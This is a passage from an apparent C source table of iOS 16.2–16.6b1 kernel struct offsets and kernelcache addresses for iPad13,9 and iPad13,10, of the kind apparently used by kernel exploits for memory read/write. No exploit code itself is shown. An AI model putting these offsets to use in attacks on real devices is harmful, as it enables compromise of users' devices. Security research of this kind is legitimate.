.kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Pro 11 inch 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f5190, .kernelcache__gPhysBase = 0xfffffe00079a00c8, .kernelcache__gPhysSize = 0xfffffe00079a00c8 + 8, .kernelcache__gVirtBase = 0xfffffe000799e2a8, .kernelcache__perfmon_devices = 0xfffffe000aa303b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7f50, .kernelcache__ptov_table = 0xfffffe00078eb378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2f800, .kernelcache__vm_pages = 0xfffffe00078e8090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2f7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aad5288, .kernelcache__gPhysBase = 0xfffffe0007a84100, .kernelcache__gPhysSize = 0xfffffe0007a84100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a822d8, .kernelcache__perfmon_devices = 0xfffffe000ab13520, .kernelcache__perfmon_dev_open = 0xfffffe00080d45c0, .kernelcache__ptov_table = 0xfffffe00079cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab12990, .kernelcache__vm_pages = 0xfffffe00079cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab12988, .kernelcache__vn_kqfilter = 0xfffffe000812374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Pro 11 inch 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f5190, .kernelcache__gPhysBase = 0xfffffe00079a00c8, .kernelcache__gPhysSize = 0xfffffe00079a00c8 + 8, .kernelcache__gVirtBase = 0xfffffe000799e2a8, .kernelcache__perfmon_devices = 0xfffffe000aa303b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7f50, .kernelcache__ptov_table = 0xfffffe00078eb378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2f800, .kernelcache__vm_pages = 0xfffffe00078e8090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea328, 